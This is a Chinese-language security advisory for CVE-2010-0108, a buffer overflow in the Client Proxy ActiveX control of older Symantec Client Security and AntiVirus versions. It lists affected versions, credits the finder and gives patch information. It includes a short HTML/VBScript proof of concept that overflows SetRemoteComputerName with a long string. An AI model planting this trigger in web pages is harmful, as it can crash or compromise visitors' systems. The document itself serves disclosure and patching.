发布日期：2010-02-17
更新日期：2010-02-19

受影响系统：

Symantec Client Security 3.1.x
Symantec Client Security 3.0.x
Symantec AntiVirus 10.2.x
Symantec AntiVirus 10.1.x
Symantec AntiVirus 10.0.x

不受影响系统：

Symantec Client Security 3.1 MR9
Symantec AntiVirus 10.2.MR4
Symantec AntiVirus 10.1.MR9

描述：

---

BUGTRAQ  ID: 38222
CVE(CAN) ID: CVE-2010-0108

Symantec Client Security是集成了反病毒和防火墙的个人终端安全产品，Client Proxy是其中的一个组件。

Client Proxy的ActiveX控件实现上存在缓冲溢出漏洞，远程攻击者可能利用此漏洞通过诱使用户访问恶意网页在用户系统上执行任意指令，从而最终控制用户系统。

<*来源：Alexander Peshkov
  
  链接：http://secunia.com/advisories/38651
        http://dsecrg.com/pages/vul/show.php?id=139
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:E381F1C0-910E-11D1-AB1E-00A0C90F8F6F' id='target' />
<script language='vbscript'>

arg1=String(7188, "A")

target.SetRemoteComputerName arg1

</script>
</html>

建议：

---

厂商补丁：

Symantec
--------
目前厂商已经发布了升级补丁以修复这个安全问题，用户可以使用Symantec LiveUpdate进行升级。

http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2010&suid=20100217_02

浏览次数：3237
严重程度：0（网友投票）